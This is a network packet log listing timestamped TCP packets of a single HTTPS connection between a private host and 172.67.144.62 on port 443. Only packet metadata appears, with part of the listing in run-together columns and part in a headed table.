                                                      Jan 1, 2025 05:36:02.139765024 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139791965 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139827967 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139882088 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139885902 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139919043 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140198946 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140217066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140252113 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140258074 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140284061 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140301943 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140444994 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140459061 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140491962 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140495062 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140503883 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140527010 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140531063 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140551090 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140553951 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140580893 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140599012 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140893936 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140908003 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140979052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140983105 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140994072 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.141021967 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.141025066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.141051054 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.141074896 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232028961 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232062101 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232131004 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232140064 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232177973 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232387066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232408047 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232441902 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232446909 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232460022 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232502937 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232538939 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232543945 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232553005 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232582092 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232669115 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232721090 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233016968 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233032942 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233079910 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233084917 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233108044 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233139038 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233499050 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233521938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233577967 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233582020 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233628035 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233897924 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233922005 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233962059 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233966112 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.233990908 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234009027 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234070063 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234086990 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234124899 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234127998 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234155893 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234174013 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234198093 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234220982 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234276056 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.234281063 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.234318018 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324286938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324302912 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324362993 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324368954 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324405909 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324453115 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324466944 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324506044 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324508905 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324536085 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324547052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324834108 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324847937 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324893951 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.324898958 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.324934959 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325351000 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325364113 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325393915 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325412989 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325417042 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325438023 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325458050 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325850010 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325865984 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325921059 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325925112 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.325937033 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.325956106 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.326215982 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326230049 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326277971 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.326282024 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326319933 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.326522112 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326580048 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.326584101 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326621056 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.326704025 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.326747894 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.327028990 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.327040911 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.327081919 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.327085972 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.327105999 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.327126980 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.416667938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.416686058 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.416744947 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.416794062 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.416827917 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.416851044 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.416870117 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.416886091 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.416943073 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.416943073 CET49731443192.168.2.4172.67.144.62
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Jan 1, 2025 05:36:02.416960001 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417009115 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417109966 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417124033 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417176008 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417182922 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417196035 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417221069 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417385101 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417401075 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417439938 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417444944 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417484999 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417639971 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417654037 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417686939 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417696953 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417710066 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417731047 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.417965889 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.417980909 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418031931 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418036938 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418080091 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418097973 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418371916 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418391943 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418442965 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418447971 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418457985 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418483973 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418529987 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418545961 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418584108 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418589115 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.418652058 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.418652058 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509397984 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509427071 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509489059 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509500980 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509521961 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509603977 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509622097 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509632111 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509635925 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509644985 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509684086 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509697914 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509711027 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509752035 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509756088 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509792089 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.509974003 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.509987116 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510013103 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510018110 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510034084 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510067940 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510260105 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510273933 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510318995 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510322094 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510379076 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510621071 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510634899 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510685921 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510689974 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510736942 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510811090 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510852098 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510860920 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510864973 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510874987 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.510888100 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.510904074 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.511151075 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.511178017 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.511219025 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.511224031 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.511244059 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.511270046 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.601846933 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.601867914 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.601914883 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.601922989 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.601955891 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.601978064 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602055073 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602071047 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602114916 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602119923 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602161884 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602370977 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602385044 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602431059 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602436066 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602472067 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602610111 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602622986 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602653027 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602658987 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602669954 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602708101 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602916956 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602932930 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.602987051 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.602991104 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603029966 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603503942 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603523016 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603555918 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603560925 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603585958 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603604078 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603657961 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603697062 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603708982 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603712082 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603733063 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603737116 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603749037 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603749990 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603761911 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603779078 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603784084 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603811026 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603813887 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.603826046 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.603852034 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694376945 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694392920 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694469929 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694474936 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694497108 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694514036 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694581032 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694598913 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694633961 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694637060 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694668055 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694689035 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694875956 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694895983 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694937944 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.694947958 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.694952011 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695003033 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695008993 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695184946 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695207119 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695234060 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695238113 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695266008 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695287943 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695424080 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695445061 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695492983 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695497990 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695549011 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695677042 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695722103 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695728064 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695765018 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695924997 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695940018 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695966005 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.695969105 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695986986 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.695998907 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696012974 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696019888 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696033001 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696065903 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696068048 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696077108 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696105003 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696326971 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696340084 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696544886 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.696549892 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.696607113 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787031889 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787055016 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787134886 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787148952 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787174940 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787192106 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787221909 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787236929 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787283897 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787287951 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787322998 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787420988 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787458897 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787470102 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787472963 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787484884 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787499905 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787520885 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787533998 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787748098 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787761927 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787803888 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787806988 CET  443          49731      172.67.144.62  192.168.2.4
Jan 1, 2025 05:36:02.787832975 CET  49731        443        192.168.2.4    172.67.144.62
Jan 1, 2025 05:36:02.787844896 CET  49731        443        192.168.2.4    172.67.144.62
